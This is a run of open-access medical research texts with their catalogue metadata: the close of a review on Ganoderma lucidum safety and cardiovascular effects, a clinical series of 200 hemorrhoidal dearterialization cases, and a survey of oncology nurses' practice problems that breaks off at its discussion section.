G. lucidum is generally regarded as safe and is listed in the safest drug class (Class 1 Drug) in the American Herbal Products Association Botanical Safety Handbook, with no known herb-drug interactions (McGuffin et al. 1997). Recent human clinical trials with G. lucidum have included laboratory safety parameters such as hepatic, renal, and haematological biomarkers, and no pathological abnormality or serious adverse event has been reported (Klupp et al. 2015, 2016). Mild symptomatic adverse effects such as dry mouth, sore throat, and nausea have been reported occasionally. A case of hepatotoxicity related to G. lucidum mushroom powder was reported from Hong Kong in 2004, but this was thought to be due to the excipient ingredients (Yuen et al. 2004). Another case, of fatal fulminant hepatitis in a patient taking Lingzhi in powder form, was reported from Thailand in 2007 (Wanmuang et al. 2007). Such cases need careful assessment before the effects are attributed to G. lucidum components, but they also illustrate the need to be vigilant with herbal treatments.
It is important to be cautious when taking herbal supplements in combination with conventional medications, particularly those that are very sensitive to herb or drug interactions such as warfarin. Most herbal supplements are contraindicated in patients taking warfarin. G. lucidum may have a mild antithrombotic effect itself in high doses and this could increase the effect of other anticoagulant or antiplatelet medications, including aspirin (Kumaran et al. 2011), resulting in an increased risk of bruising or bleeding. In patients taking other prescription medications, it is generally better to separate the intake of those medications and G. lucidum products by at least two hours in case there is any interference with drug absorption.
Conclusions
G. lucidum has a reputation for many beneficial effects from a historical perspective and its safety has largely been established by empirical observation. The beneficial effects are supported by several in vitro studies and studies in animals, but clinical trials in humans in the cardiovascular field are limited. Moreover, the use of different products in the clinical trials makes it difficult to compare the results. In the prevention and treatment of CVD, the hypoglycaemic effects of G. lucidum are the best-established properties from the in vitro and animal studies, but these benefits have not been confirmed in recent clinical trials. Components from G. lucidum herbal materials have been identified with lipid-lowering and antihypertensive effects and compounds with specific mechanisms of action have been isolated. Nevertheless, the content of these components and their bioavailability in different G. lucidum formulations are uncertain and clinical trials in these areas have been inadequate. Further studies are needed to isolate all the active ingredients with known biological activity, and to characterise their bioavailability for specific indications, before clinical trials pertaining to the use of G. lucidum products for relevant clinical benefits are conducted. Clinical trials should be performed in subjects with abnormal baseline levels of the cardiovascular risk factors being targeted so that improvements can be seen more readily.
"year": 2021,
"sha1": "bc1d9165c0bcdc459905cdf160d827cb5e86ece1",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.1080/13880209.2021.1969413",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "ec4594dfea3f456785059ab21e16f0a1fb0a9340",
"s2fieldsofstudy": [
"Medicine",
"Environmental Science"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Transanal hemorrhoidal dearterialization: Lessons learned from a personal series of 200 consecutive cases and a proposal for a tailor-made procedure
Background Transanal hemorrhoidal dearterialization (THD) is an effective treatment for hemorrhoidal disease (HD). However, the surgical technique is not standardized and the results for advanced HD are controversial. The aim of this study was to assess surgical outcomes after a long follow-up and compare total and partial mucopexy. Materials and methods Between March 2011 and July 2014, THD was offered to patients with symptomatic prolapsed hemorrhoids (Grades II, III and IV). Dearterialization was performed under ultrasound Doppler guidance, with mucopexy for prolapsed piles regarded as total or partial (if fewer than 6 mucopexies). Post-operative complications, long-term results and patients' satisfaction rates were analyzed. Results 200 consecutive patients were recruited, with a mean follow-up of 43 months (range 29-57 months). HD distribution was GII (N = 35, 17.5%), GIII (N = 124, 62%), and GIV (N = 41, 20.5%). Postoperative complications included transient tenesmus (26.5%), pain (14%) and fecal impaction (2.5%). Recurrence rates were 0%, 2.4% and 17.1% for prolapse (p < 0.01) and 2.9%, 4% and 9.8% for bleeding (p = 0.33) in grades II, III and IV, respectively. Total mucopexy resulted in more tenesmus (31.2%) than partial mucopexy (14.5%) (p < 0.01). After 12 weeks of follow-up, 85% of patients were either very satisfied or satisfied; 8.5% were dissatisfied. Conclusion THD-mucopexy is safe with low overall recurrence. Grade IV HD is associated with more recurrence and postoperative complications. Total mucopexy is associated with more tenesmus, pain and fecal impaction. A tailor-made procedure with selective dearterialization and mucopexy may be the next step in this evolving technique.
Introduction
Hemorrhoidal disease (HD) remains one of the most common afflictions seen by surgeons and gastroenterologists worldwide. Knowledge of its existence as well as its treatments dates from time immemorial and several studies have already been published about its history, epidemiology, and treatment modalities, yet no consensus has been reached about its precise incidence, prevalence, and standard of care to date.
Treatment of HD is not straightforward because of the several different presentations and the frequent association with other anorectal ailments, such as: skin tags, thrombosis, fistulas, anal fissures, etc. Hemorrhoids may be internal, external, or both; single or multiple; have different sizes and forms. Therefore, a definitive conclusion about the ideal therapy for hemorrhoids is close to utopian.
Surgical treatment by pile excision has been regarded as the most effective way to eradicate symptoms and to avoid recurrence. Although "radical" pile resection was the gold-standard therapy for decades, its tempestuous post-operative course, its short-term and long-term sequelae, and a better understanding of hemorrhoid pathophysiology have propelled colorectal surgeons to attempt other forms of treatment. Thus, anoderm-preserving methods of the distal rectum and anal canal, such as the dearterialization and mucosal pexy (or lifting) techniques described in the past two decades, have gained wide acceptance. Stapled mucosal resection and anopexy, also known as the procedure for prolapse and hemorrhoids (PPH), and hemorrhoidal artery ligation (HAL), also known as transanal hemorrhoidal dearterialization (THD), comprise the most important advances in this direction [1][2][3]. THD may be Doppler-guided or not, and done with or without mucopexy [4,5].
In this study, we report our personal experience with one of such techniques, THD and mucopexy (THD-M), with a prolonged follow-up. We compare our experience and acquired learning of its pitfalls with other reported series, and we entertain ways to customize this evolving technique into a tailor-made procedure.
Materials and methods
Between March 2011 and July 2014, patients with symptomatic prolapsed hemorrhoids were recruited for THD-M at the University of São Paulo's teaching hospital, Hospital das Clínicas, and from our private practice at Hospital Nove de Julho, São Paulo, Brazil. Grading was established according to Goligher's classification [6]. Data were collected prospectively and results were analyzed at the end of the follow-up. The aim of this study was to assess early and late results after a long follow-up and to compare total and partial mucopexy.
Eligible patients had grade II HD refractory to conservative management (fiber-enriched diet, laxatives, and life-style changes, or ambulatory rubber band ligation), as well as grades III and IV. External hemorrhoids and skin tags were meticulously assessed. All patients were thoroughly interviewed with emphasis on evacuatory and hemorrhoidal symptoms, and subjected to complete proctologic examination including anoscopy.
All patients 50 years of age or older underwent colonoscopy. Exclusion criteria included coagulation disorders, pregnancy, inflammatory bowel disease, previous anorectal surgery, rectal procidentia, anal incontinence, immunosuppression and anorectal cancer. Patients with external hemorrhoids and skin tags were also included. Patients were thoroughly instructed as to their diagnosis, therapeutic options, the proposed procedure and its potential complications before the operation was carried out. All patients signed an informed consent form of their own free will before the operation. The hospital's ethics committee approved the informed consent form and the operative protocol. This manuscript has been reported in line with the STROCSS criteria [7].
THD-M was offered as first choice treatment for 262 consecutive patients who fitted the eligibility criteria. Medical provider restrictions or patient preferences reduced the final THD-M group to 200 patients (55 were eventually operated by stapled-hemorrhoidopexy, and 7 by conventional hemorrhoidectomy).
The degree of satisfaction with the procedure was assessed 12 weeks after the surgery, and classified into four levels: very satisfied, somewhat satisfied, indifferent or dissatisfied. Any referred complication was also written in the follow-up chart.
Statistical analysis was performed with the objective of making comparisons between the degrees of hemorrhoidal disease, type of mucopexy and surgical outcomes. To make these comparisons, Fisher's exact test and chi-square tests were used, with a significance level of 5% for two-tailed tests. The analyses were performed using IBM-SPSS software for Windows, version 20.0.
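As a rough illustration of the kind of comparison reported here, the sketch below runs a chi-square test on the prolapse-recurrence counts given later in this paper (0/35 for grade II, 3/124 for grade III, 7/41 for grade IV). The original analysis was performed in IBM-SPSS, and the exact contingency tables and choices between chi-square and Fisher's exact test for each comparison are not fully specified, so this is illustrative only.

```python
# Chi-square test over the reported prolapse-recurrence counts by grade.
# Rows: grades II, III, IV; columns: [recurrence, no recurrence].
from scipy.stats import chi2_contingency

table = [
    [0, 35],   # grade II: 0 recurrences out of 35
    [3, 121],  # grade III: 3 recurrences out of 124
    [7, 34],   # grade IV: 7 recurrences out of 41
]
chi2, p, dof, expected = chi2_contingency(table)
print(f"chi2 = {chi2:.2f}, dof = {dof}, p = {p:.4f}")
# Note: with expected cell counts this small, Fisher's exact test (which the
# authors also used) would be the more appropriate choice for 2x2 comparisons.
```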
Operative technique
All THD-M procedures were performed under laryngeal mask airway control anesthesia. Intestinal cleansing or enemas were not done prior to the operation. The operative procedure was performed as previously described in detail by Ratto et al. [8].
Patients were positioned in the lithotomy position. A prophylactic antibiotic (ciprofloxacin i.v.) was administered to all patients. A THD Doppler Kit device was used (THD Slide® S.p.A., Correggio, Italy). Following lidocaine gel lubrication, the proctoscope was inserted through the anal canal, reaching the lower rectum about 4-5 cm from the anal verge. Six arterial trunks were almost always identified at 1, 3, 5, 7, 9, and 11 o'clock. The rectal mucosa and submucosa were then transfixed with an "X" suture (2-0 absorbable polyglycolic acid with a 5/8-inch needle) to ligate the artery. The depth of the transfixed stitches was easily and safely calibrated by using the pivot hole provided in the center of the proctoscope lumen. Each mucosal point distal (caudad) to these trunks was marked with electrocautery just above the pectinate line (10 mm above). Mucopexy was performed with the original proctoscope, making multiple passages of a continuous suture through the mucosa and submucosa until the anorectal ring was reached at the point previously marked with the electrocautery (above the pectinate line). One firm cranial knot elevated and fixed the mucosal prolapse (mucosal lifting), thus completing the mucopexy. During the procedure, the anal canal mucosa was always spared from the suture. Mucopexy was only performed in patients with prolapsed hemorrhoids and was regarded as partial when fewer than six running sutures were performed, and as total when six sutures were performed. The type of mucopexy performed was chosen at the discretion of the surgeon at the time of the surgery.
Patients were discharged within 24 h, mostly after the first bowel movement, and maintained on a liquid-rich and fiber-enriched diet, as well as with emollients. Patients were advised to avoid intense physical exercise and fecal straining for at least 2-3 weeks post-operatively. If no passage of stools occurred within 48 h, patients were advised to use osmotic laxatives (lactulose or polyethylene glycol 3350), and unsuccessful cases returned for medical re-evaluation. Analgesia was provided with ketoprofen 100 mg twice a day, dipyrone 1 g every 6 h, or paracetamol 750 mg three times a day, for 5-7 days. Upon discharge, patients were re-evaluated at 1, 3, and 12 weeks, as well as 6 and 12 months post-operatively, or on demand. They were examined and questioned about anal bleeding, prolapse, pain, fecal incontinence, and bowel habits.
Early postoperative results
Early postoperative results were assessed during the hospital stay and at the first and third postoperative weeks following the surgery. Mean operative time was 27 min (range: 23-50 min). All patients had a total of 6 dearterializations done 4-5 cm above the anal verge. Total mucopexy was done in 138 patients (69%), and partial mucopexy in 62 patients (31%). Associated procedures were necessary in 37 patients (18.5%): skin tag excision in 29 (14.5%), hypertrophic papilla excision in 3, resection of an anal canal polyp in 3, and resection of a sebaceous cyst in 2. Hospital stay was 1 day for 191 patients (95.5%), 2 days for 6 patients (3%), and 3 days for 3 patients (1.5%). Time to full return to normal daily activity was 4-7 days (mean 5.2 days) for 187 patients (93.5%), and more than 7 days for 13 patients. Intraoperative complications were 1 (0.5%) rectal hematoma and 1 (0.5%) rectal bleeding, which were successfully treated by transfixing hemostatic 2-0 polyglactin sutures. There was no perioperative mortality, nor was there any 30-day mortality.
Postoperative (PO) complications included transient tenesmus in 53 patients (26.5%) in the first 7 PO days, and opioid-requiring pain in 28 (14%) patients. Early PO active bleeding requiring surgical intervention occurred in 3 patients (1 caused by mucosal ulceration, and 2 by loosening of one of the dearterialization running sutures); all were successfully resolved by hemostatic suturing. Urinary retention requiring bladder catheterization occurred in 4 (2%) patients (all were male and older than 50 years). Fecal impaction occurred in 5 (2.5%) patients, who were treated with osmotic laxatives and/or enema administration. External hemorrhoidal thrombosis occurred in 7 (3.5%) patients, and only 2 of them required surgical intervention. Anal fissures in the PO period were observed in 2 patients, who were successfully treated conservatively (0.5% isosorbide dinitrate ointment and laxatives) for 8 weeks.
Long term results
Mean follow-up time was 43 months (range 29-57 months). All patients were clinically re-evaluated at 12 months PO, and all were interviewed by phone 3 months prior to the writing of this paper. At late follow-up, 10 (5%) patients presented prolapse recurrence (3 had previously been classified as grade III and 7 as grade IV hemorrhoids). Seven were treated by rubber band ligation, 2 by Ferguson's hemorrhoidectomy, and 1 by re-THD-M (Fig. 1). Minor recurrent anal bleeding after the first PO week was observed in 10 patients, all of them successfully managed with phlebotonics and suppositories. At 12 weeks PO, no patient reported bleeding. Residual skin tags were observed in 14 (7%) patients, and excision was done in 3 patients at their request (pruritus and hygiene difficulty). After 12 weeks of follow-up, 67% (134/200) of patients were very satisfied, 18% (36/200) somewhat satisfied, 6.5% (13/200) indifferent, and 8.5% (17/200) dissatisfied. Neither chronic anorectal pain nor fecal incontinence was reported at any PO time up to the writing of this paper (see Table 1).
Discussion
THD-M is a minimally invasive technique for the treatment of HD, with lower rates of postoperative pain and shorter recovery when compared with conventional hemorrhoidectomy. However, there are aspects of the surgical technique that may influence outcomes and still need to be addressed, such as the number of dearterializations, whether Doppler guidance is required, and whether total or partial mucopexy achieves different results.
Our present study of 200 patients submitted to Doppler-guided THD aimed to compare early and late results in regard to control of prolapse and bleeding, and also to assess whether the type of mucopexy (total or partial) influences outcomes. Our mean follow-up was 43 months, which is longer than in most series and may allow the diagnosis of late recurrences.
The operating time ranged from 23 to 50 min, and return to regular activities occurred on average at 5.2 days. Resolution of bleeding and prolapse was achieved in 95% of the patients. At the end of 12 weeks, 85% were satisfied or very satisfied, 6.5% indifferent, and 8.5% dissatisfied. Similar results have been published [9].
Surgical complications were mostly of low complexity and there was no perioperative mortality. Reoperation due to bleeding was required in 2 patients (1%) and successfully controlled with hemostatic suturing. Postoperative pain, defined as pain requiring opioids for control, was present in 14% of our patients. Interestingly, pain was more severe in grade IV HD (39.1%), compared with grades III (8.06%) and II (5.7%) (p < 0.01). Rubini and Tartari also reported more pain in grade IV HD and in those submitted to more than four mucopexies [10]. This is probably due to local edema and transitory ischemia caused by the suture lines at the distal rectum, often described by patients as a "burning pain sensation".
Fecal impaction is rarely reported in the literature following the THD-M procedure, possibly because it is not considered a complication. All 5 patients who had fecal impaction had grade IV HD and were submitted to total mucopexy. Postoperative constipation has been reported in up to 7% of cases [11]. Hemorrhoidal thrombosis was diagnosed in 7 patients (3.5%). Five patients were managed clinically, but the other two were treated with thrombectomy. Two patients (1%) developed anal fissure and were treated successfully with fibers, laxatives and 0.5% isosorbide dinitrate. This complication is infrequent and has been reported in less than 1% of cases [5,23]. Residual skin tags were noticed in 14 patients (7%) and surgical resection was necessary in 4 due to pruritus and difficulty with hygiene. This finding has been previously reported in 3.9 to 8.3% of patients following THD [4,12,13].
The most frequent complication was tenesmus. Patients who were submitted to total mucopexy were more likely to report this complication (31.2%) than those submitted to partial mucopexy (14.5%) (p < 0.05). Total mucopexy was not associated with better control of prolapse or bleeding (Table 3). It should be noted that the type of mucopexy was chosen at the discretion of the surgeon at the time of the surgery and that the two groups were not randomized, which could have led to bias; it is possible that more complex disease (more prolapsed piles) was preferentially treated with total mucopexy. However, our impression is that HD comprises a heterogeneous group of patients, even within the same Goligher grade, and randomizing them according to the type of mucopexy could not have completely solved the problem. Our data show that partial mucopexy achieves good results and that total mucopexy is not necessary for all patients, especially those with fewer prolapsed piles.
Ratto et al., in the largest series published to date, reported "pain/tenesmus" in 3.1% of their patients [14]. However, their definition of "pain/tenesmus" was patients who required painkillers for more than 5 days, which was not the definition we used in our study. It is often difficult to differentiate pain from tenesmus in the first few PO days, so we actively inquired of patients about the urge to defecate and the sense of incomplete evacuation.
In regard to long-term outcomes, there was a much higher recurrence of prolapse in grade IV HD (17.1%) when compared with grades II (0%) and III (2.4%) (p < 0.001) (Table 2). Similarly, more patients with advanced HD reported recurrence of bleeding: 9.5% of grade IV, 4.03% of grade III and 2.85% of grade II, although this was not statistically significant (p = 0.33). Interestingly, as noticed by other authors, recurrence after the THD procedure usually involves just 1 or 2 piles, which allows treatment with less invasive procedures, such as rubber band ligation [9,14,15]. In our series, rubber band ligation was performed in 7 patients, 2 were submitted to conventional hemorrhoidectomy, and 1 to re-THD-M, all with good outcomes.
In the literature, there is high variability in terms of recurrence for grade IV HD, ranging from 9% [16] up to 50% [17]. A Brazilian multicenter study of 705 patients published by our group reported a general recurrence rate of 6.4%, but 26.5% for grade IV HD [18]. Ratto et al. reported recurrence of prolapse and bleeding in 18.1% of patients with grade IV HD, and in 8.7% and 8.5% for grade III and grade II, respectively [14]. Giordano et al., in an attempt to reduce the recurrence rate, suggested that the dearterialization and the mucopexy should be performed using two different sutures, and noticed recurrence in just 1 of 31 patients (3%) [19]. However, grade IV HD was defined as "those with constant prolapse, regardless if they were reducible or not", which is not accurate according to Goligher's classification and may have improved the results through the inclusion of grade III HD.
Anatomic studies of the anal canal have shown important variability in the number and position of the arteries that form the hemorrhoidal plexus at the distal rectum and anal canal [20,21]. Studies of the THD technique without the guidance of a Doppler probe have achieved comparable outcomes [22][23][24]. This calls into question whether the real benefit of the THD technique arises from the ligation of a specific artery. Most likely, changes in the microcirculation and improved venous return due to the correction of the prolapse play a role.
Other authors have assessed the arterial blood flow of hemorrhoids with Doppler guidance after the PPH technique (Procedure for Prolapse and Hemorrhoids), which removes a strip of mucosa, submucosa and not infrequently the muscular wall of the distal rectum, but have demonstrated no changes in blood flow [25,26].
In line with the presented data, we have made adjustments to our surgical technique and currently have an ongoing study to analyze the results. Instead of performing the dearterialization at the usual 6 points of the anal canal or guided by ultrasound Doppler, we selectively perform the dearterialization and the mucopexy only above the prolapsed piles. Our impression is that minimizing the sutures achieves similar outcomes in terms of recurrence, with possibly less early post-operative morbidity, such as pain, tenesmus and fecal impaction.
Conclusions
In conclusion, this study confirms that THD-M is safe, achieves good long-term outcomes and high patient-reported satisfaction rates. Overall recurrence is low, but specifically in Grade IV HD, more recurrence of the prolapse is expected and patients should be informed in advance. Total mucopexy is associated with more postoperative tenesmus, pain and fecal impaction and it is not necessary for all patients. A tailor-made procedure with selective dearterialization and mucopexy just above symptomatic piles may be the next step in this evolving technique.
Ethical approval
Ethical approval was given for this study.
Sources of funding
There was no funding for this research.
Author contribution
Carlos
Guarantor
Carlos Walter Sobrado accepts full responsibility for the data and decision to publish.
Consent
Written informed consent was obtained from the patient for publication of this case report and accompanying images. A copy of the written consent is available for review by the Editor-in-Chief of this journal on request.
Provenance and peer review
Not commissioned, externally reviewed.
Declaration of competing interest
There are no relevant conflicts of interest or disclosures. | 2020-06-04T09:12:37.670Z | 2020-05-29T00:00:00.000 | {
"year": 2020,
"sha1": "43da66d060a75942508998ebf1119e2c1cf98839",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.1016/j.amsu.2020.05.036",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "730fefce0d6d813e1a390633b2a32e46b70e6a87",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
38638843 | pes2o/s2orc | v3-fos-license | Important issues in clinical practice: Perspectives of oncology nurses
As the 1990s draw to a close, the cancer care environment is undergoing rapid change. Many issues exist within the complex environment of cancer care that could create a challenge in providing quality nursing care to patients. This study examined the current challenges oncology nurses face in their daily practice. Surveys were mailed to members of the Canadian Association of Nurses in Oncology asking them to indicate on a list of 80 issues which were problems in their daily practice. From the responses of 249 oncology nurses, the following items were ranked as the top 10 problems: anxiety, coping/stress management, bereavement/death, fatigue, metastatic disease, comfort, pain control and management, quality of life, recurrence of primary cancer, and nurse burn-out. Principal component analysis was conducted to determine if patterns existed in the way problems had been rated. Five components explained 42% of the variance in the data set: comprehensive cancer care, communication, experience of loss, terminal illness, and signs and symptoms. Implications for nursing practice, education and research are highlighted.
Introduction
As the 1990s draw to a close, providing nursing care for individuals with cancer and their families remains a challenge across Canada. Many issues exist within the complex environment of cancer care that contribute to the challenge of providing quality oncology nursing care.
The demand for cancer care is on the rise because of an increasing incidence of cancer and the aging trend in the Canadian population. In 1998, 129,200 Canadians were expected to be diagnosed with cancer (NCIC, 1997). In the past decade, the number of new cases increased by close to 30,000, up almost one-third from the 100,000 cases diagnosed in 1988. This type of increase is expected to continue into the next decade. The increasing demand for cancer services will mean higher costs to maintain current levels of service. In addition, many of the new treatments currently under investigation and soon to be available are costly agents to administer (D. Cowan, personal communication, October 1998).
Concerns about the future and costs for health care have mobilized significant activity in health care reform. The subsequent restructuring and downsizing has had an impact in various ways. Care that once was delivered in hospitals is now being delivered in ambulatory settings or in the patient's home. Shortened hospital stays and a high frequency of same-day procedures mean individuals are going home with many needs for care. High patient-to-nurse ratios influence inpatient nurses' ability to provide patient education for self-care and to establish effective community links for patients following discharge. Frequently patients report that care is fragmented and coordination poor (Ontario Ministry of Health, 1992-3).
Advances in knowledge and technology have led to increasingly complex treatment protocols. It is not unusual for patients to receive chemotherapy and radiation therapy concurrently. Managing symptoms and counteracting side effects are ever-present issues for both nurses and patients.
The nature of cancer and its treatment also contributes to the complexity of delivering care. The diagnosis of cancer has an impact that is not only physical but also emotional, psychological and spiritual. For many individuals, cancer is equated with a "death sentence". Coping with cancer means an individual must handle a multitude of feelings and practical concerns. Patients frequently express frustration concerning how difficult it is to achieve timely access to relevant, understandable information that would help them cope (Ontario Ministry of Health, 1992-3). Patients also report lack of access to supportive care services or programs (McLeod, 1994).
Another trend which has added challenge to the delivery of cancer care is the rising survivor advocacy movement. Survivors are advocates for change in the cancer care system. They are calling for increased access to information and increased participation by patients in decision-making about their care. Frequently, these types of requests are perceived by busy oncology staff as demands that increase the length of clinic appointments and interfere with clinic efficiency. Additionally, many patients are actively pursuing complementary and alternative therapies in an attempt to exert some control over their situation and enhance their well-being (Gray et al., 1997). However, many alternative therapies are not supported with empirical evidence and oncology nurses may experience a sense of conflict in discussing them with patients.
Oncology nurses cannot help but be influenced by the changing cancer care environment. Challenges emerge for nurses as they strive to provide quality care within the constraints and pressures of the working environment. Dealing with these new practice challenges has implications for education, research and policy development.
The purpose of this investigation was to identify the current challenges oncology nurses face in their daily practice. Once identified, the challenges can provide a basis for future investigation and program development. In particular, challenges which occur most frequently could pinpoint priorities for action by researchers, administrators, educators and professional nursing associations.
Therefore, this study examined the perspectives of nurses who work in oncology care settings about the clinical and professional issues that are recognized as problems in their daily practice.
Methods
Data about important clinical issues were gathered from nurses working in oncology care settings. Eight hundred and ten questionnaires were mailed using the 1995 Canadian Association of Nurses in Oncology (CANO) membership listing. Respondents were requested to complete and return the questionnaire anonymously within four weeks. A reminder letter was sent after four weeks as a means of increasing the response rate.
A demographic data form and a survey questionnaire were developed by the investigators. The survey questionnaire included an alphabetical listing of 80 topic items. The items were derived from topics included in previous Oncology Nursing Society research priority surveys (Funkhouser & Grant, 1989; Mooney, Ferrell, Nail, Benedict & Haberman, 1991; Stetz, Haberman, Holcombe & Jones, 1995) as well as from newly emerging issues identified in the oncology nursing literature. Topics covered a wide range of areas including biophysiological (e.g., pain control and management, stomatitis, nutrition) and psychosocial (e.g., patient disclosure, communication) patient issues that spanned the cancer care spectrum. In addition, professional issues such as models of nursing care and oncology nurse job satisfaction were included in the list. An "other" category also was included to allow respondents to write in items that they perceived were missing.
For each topic item, respondents were instructed to answer two questions. The first question asked them to indicate the extent to which the item posed a problem in their daily practice. A problem was defined "as an issue or situation needing a solution or better information". Respondents rated an item as a problem according to the following scale: not at all, sometimes, often, always, or do not know. The second question asked respondents to indicate the extent to which the item should be given nursing research attention according to the following scale: none, some, or a lot.
Questions pertaining to nurses' perceptions about research priorities were also included in the questionnaire. Data collected from the research priorities questions are presented elsewhere (Bakker & Fitch, 1998).
Sample characteristics
Of the 810 surveys mailed to CANO members, 249 were returned for a response rate of 31%. Table One shows the demographic characteristics of the nurse respondents. The majority (61%) of respondents were between 35 and 49 years of age. Over 40% had been employed for 16 to 25 years in nursing and most (60%) had been employed in oncology from six to 15 years. In terms of their clinical practice, the respondents predominantly worked with adult cancer patients in hospital or ambulatory care settings. Seventy-three per cent reported that more than 75% of their practice involved caring for cancer patients. Of the 16.5% of nurses with post-graduate university degrees, the majority were at the Masters level.
Topics identified as important clinical problems
To determine important clinical problems as perceived by oncology nurses, rank order listings of the 80 topic items were developed. First, a total score was calculated for each item based on how respondents rated the item as a "problem" in their clinical practice. Points were assigned as follows: three points for "always a problem"; two points for "often a problem"; one point for "sometimes a problem"; and zero points for "not a problem" or "do not know". The item's rank order was determined by total points accumulated.
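A minimal sketch of this scoring scheme, written in Python for illustration; the item names and the individual ratings below are invented, and the point mapping simply mirrors the assignments described above.

```python
# Map each rating string to points (always=3, often=2, sometimes=1,
# "not a problem"/"do not know"=0), sum per item, and rank by total score.
POINTS = {"always": 3, "often": 2, "sometimes": 1,
          "not at all": 0, "do not know": 0}

def rank_items(responses):
    """responses: dict mapping item name -> list of rating strings."""
    totals = {item: sum(POINTS[r] for r in ratings)
              for item, ratings in responses.items()}
    # highest accumulated score first, as in the rank order listings
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)

responses = {
    "anxiety": ["always", "often", "always", "sometimes"],
    "fatigue": ["often", "sometimes", "sometimes", "not at all"],
    "pain control and management": ["always", "often", "do not know", "often"],
}
for rank, (item, score) in enumerate(rank_items(responses), start=1):
    print(rank, item, score)
```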
The top 10 clinical problems for the overall study sample (n=249) are shown in Table Two. Beside each item is its total score and the number of times (frequency) it was rated as "always a problem". The top ranked clinical problem was anxiety. This topic was rated as "always a problem" by 27% (66/249) of the sample. In accumulative points, the total score for "anxiety" ranked 47 points above the second ranked topic. The point difference between the total scores of the second place item and tenth place item was 56 points (score range 456-400). The other items included in the top 10 clinical problems included psychosocial issues of coping/stress management, bereavement/death, comfort and quality of life and biophysiological issues related either to symptom management (e.g., fatigue) or disease stage (metastatic disease). The only professional issue that surfaced in the top 10 list was nurse burn-out which received a ranking of 10.
For purposes of further analyzing perceptions of clinical problems, rank orders of important clinical problems were determined for subgroups of the oncology nurse sample. Table Three shows the rank order of clinical problems according to the age of respondents. Age was selected as a variable because of the potential influence life experience could have on one's perception of what constitutes an issue or problem. In each column, the top 10 items are listed. Beside each item is its total score and the number of times (frequency) it was rated as "always a problem". In all three age groups, "anxiety" was ranked as the most important clinical problem. With respect to differences in the lists, the younger age group was the only group to include a communication issue (specifically communication between patient/physician) as a top ranked clinical problem. Rankings determined from responses of the more mature group of nurses showed that this group ranked topics such as metastatic disease and recurrence of primary cancer higher as clinical problems than did their younger nurse colleagues.
The majority of respondents (61%) in the study were in the middle age group of 35 to 49 years. The rank ordered list of this group most closely resembled the list determined for the overall sample and the lists share the same top four choices. As rank orders of clinical topics were determined by total scores, it is likely that the responses of the middle age group contributed proportionately more to the overall ranking of items for the entire study sample. As a result, this nurse subgroup was analyzed separately and rank order lists were determined based on education and workplace for the subgroup of oncology nurses aged 35 to 49 years. Table Four illustrates the rank order of clinical problems according to three education levels for the subgroup of respondents aged 35 to 49 years. In all three education levels, the highest ranked problem was anxiety. Both the diploma and baccalaureate prepared nurse groups included nurse burn-out as a clinical problem, ranking it number 5 and number 8 respectively. In the group of Master's/PhD prepared nurses, outcome measures for interventions received the second highest ranking. As well, for this education subgroup, issues of ethics, patient/physician communication and family/nurse communication appeared on the priority list but were absent from the lists of the diploma and baccalaureate prepared education subgroups. The baccalaureate prepared nurses were the only group to include cost containment as an important clinical problem.
In terms of workplace, respondents aged 35 to 49 years who were employed in either hospital or ambulatory care settings rated anxiety as the number one clinical problem (Table Five). The rank listings of respondents working in both hospital and ambulatory care shared further similarities and included the topics of coping/stress management, bereavement/death and nurse burn-out in their top seven rankings. In contrast, similarly aged respondents employed in community settings ranked outcome measures for interventions as the most important clinical problem. This community group also included patient decision-making, cancer in the elderly and patient education in their top 10 clinical problems.
Patterns of important clinical problems
Exploratory principal component analysis was employed to look for patterns of perceived important clinical problems. This technique was selected because of the many past demonstrations of its usefulness for revealing patterns among variables or items (Ferketich & Muller, 1990; Norman & Streiner, 1994). The technique explores the relationship among items and identifies the degree to which items correlate with a smaller number of underlying components. For the purpose of this study, principal component analysis was used to identify groupings of items that correlate strongly with each other according to the sample of oncology nurses' responses on the rating scale.
Prior to conducting the principal component analysis, the entire data set was reviewed for the purpose of eliminating items consistently not considered to be a problem by the respondents. In doing this, the original 80 items listed in the questionnaire were resorted and all items reported as "not a problem" or "do not know" were eliminated. The reduced "clinical problem data set" contained 41 items that were consistently reported as a problem within the categories of "sometimes", "often" or "always". The final data set of 41 items with the sample of 249 met the criteria of having a minimum of five cases per item and at least 100 subjects, making it suitable for principal component analysis (Norman & Streiner, 1994).
The analysis initially extracted 11 components with eigenvalues greater than one. Using the criterion of Cattell's Scree Test, the first five components were retained. These five components explained 42% of the variance in the data set and each component explained at least 4% of the variance (Table Six).
Table Seven shows the five components and lists the items that significantly loaded on each component. In total, 24 of the 41 items in the dataset had loadings greater than 0.4 on one of these five components.
In naming each of the five components, the investigators examined the conceptual fit between the items in each component and selected a label that best captured their shared content.
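The pipeline described in this section (item reduction, component extraction, scree-based retention, and the 0.4 loading threshold) can be sketched in Python as below. The ratings matrix is randomly generated with the reported shape (249 respondents x 41 retained items) purely as a placeholder, and the sketch omits the varimax rotation the investigators applied before interpreting loadings.

```python
# A minimal PCA sketch: eigendecomposition of the item correlation matrix,
# scree-style retention, and flagging of |loadings| > 0.4. Data are random
# placeholders, NOT the survey responses.
import numpy as np

rng = np.random.default_rng(0)
X = rng.integers(0, 4, size=(249, 41)).astype(float)  # ratings coded 0-3

corr = np.corrcoef(X, rowvar=False)          # PCA on the correlation matrix
eigvals, eigvecs = np.linalg.eigh(corr)
order = np.argsort(eigvals)[::-1]            # largest eigenvalue first
eigvals, eigvecs = eigvals[order], eigvecs[:, order]

print("components with eigenvalue > 1:", int(np.sum(eigvals > 1)))

n_keep = 5                                   # retained by scree inspection
share = eigvals[:n_keep].sum() / eigvals.sum()
print(f"variance explained by first {n_keep} components: {share:.0%}")

# loadings = eigenvector scaled by sqrt(eigenvalue)
loadings = eigvecs[:, :n_keep] * np.sqrt(eigvals[:n_keep])
for j in range(n_keep):
    items = np.where(np.abs(loadings[:, j]) > 0.4)[0].tolist()
    print(f"component {j + 1}: items with |loading| > 0.4 -> {items}")
```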
Discussion
